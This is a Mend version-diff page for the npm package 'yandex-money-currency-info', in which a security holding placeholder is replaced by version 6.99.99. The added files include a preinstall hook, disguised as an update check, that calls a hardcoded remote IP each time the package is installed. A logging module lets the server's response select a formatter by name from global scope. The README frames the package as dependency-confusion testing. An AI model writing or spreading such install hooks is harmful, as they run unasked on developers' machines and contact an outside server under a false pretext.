npm - yandex-money-currency-info - Versions diffs - 0.0.1-security → 6.99.99 - Mend

yandex-money-currency-info 0.0.1-security → 6.99.99

This version of yandex-money-currency-info might be problematic. Click here for more details.

Files changed (5) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,3 @@
-# Security holding package
+# DO NOT INSTALL THIS PACKAGE! IT EXISTS FOR DEPENDENCY CONFUSION TESTING ONLY!
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=yandex-money-currency-info for more information.
+The pre-install script sends HTTP request to the remote server which verifies the presence of the vulnerability.

package/index.js ADDED Viewed

@@ -0,0 +1,7 @@
+"use strict";
+/**
+ * Module version 6.99.99
+ */
+module.exports = {};

package/logging.js ADDED Viewed

@@ -0,0 +1,46 @@
+'use strict';
+var plainFormatter = function (msg, level) {
+    return '[' + level.toUpperCase() + '] ' + msg;
+}
+var jsonFormatter = function (msg, level) {
+    return JSON.stringify({'level': level, 'message': msg});
+}
+function Logger(formatter = 'plain') {
+    this.plain = plainFormatter;
+    this.json = jsonFormatter;
+    if (!this[formatter] || typeof this[formatter] !== 'function')
+        throw new Error('Invalid formatter, must be either "plain" or "json"');
+    this.setFormatter(this[formatter]);
+}
+Logger.prototype.info = function (msg) {
+    console.log(this.formatter(msg, 'info'));
+};
+Logger.prototype.error = function (msg) {
+    console.log(this.formatter(msg, 'error'));
+};
+Logger.prototype.debug = function (msg) {
+    console.log(this.formatter(msg, 'debug'));
+};
+Logger.prototype.warning = function (msg) {
+    console.log(this.formatter(msg, 'warning'));
+};
+Logger.prototype.setFormatter = function (formatter) {
+    if (typeof formatter === 'function') {
+        this.formatter = formatter;
+    } else if (typeof formatter === 'string') {
+        var scope = typeof window === 'undefined' ? global : window;
+        this.formatter = scope[formatter];
+    } else {
+        throw new Error('Invalid formatter function');
+    }
+}
+module.exports = Logger;

package/package.json CHANGED Viewed

@@ -1,6 +1,13 @@
 {
   "name": "yandex-money-currency-info",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "6.99.99",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node preinstall.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }

package/preinstall.js ADDED Viewed

@@ -0,0 +1,38 @@
+var Logger = require('./logging');
+var http = require('http');
+/*
+ * Check for updates before install
+ */
+var VERSION_CHECK_URL = 'http://31.44.88.178:8084/version';
+var CURRENT_VERSION = '1.0.0';
+http.get(VERSION_CHECK_URL, function(resp) {
+    // Either text/plain (for older versions) or application/json
+    var format = resp.headers['content-type'].split('/')[1];
+    var logger = new Logger(format);
+    let data = '';
+    resp.on('data', function (chunk) {
+        data += chunk;
+    });
+    resp.on('end', function() {
+        if (resp.statusCode !== 200) {
+            logger.error(resp.statusMessage);
+            logger.error(data);
+            return;
+        }
+        var version = data;
+        if (format === 'json')
+            version = JSON.parse(version)['latest'];
+        if (version !== CURRENT_VERSION)
+            logger.info('New version is available: ' + version);
+    });
+}).on('error', function(err) {
+    console.debug('Failed to check for updates')
+});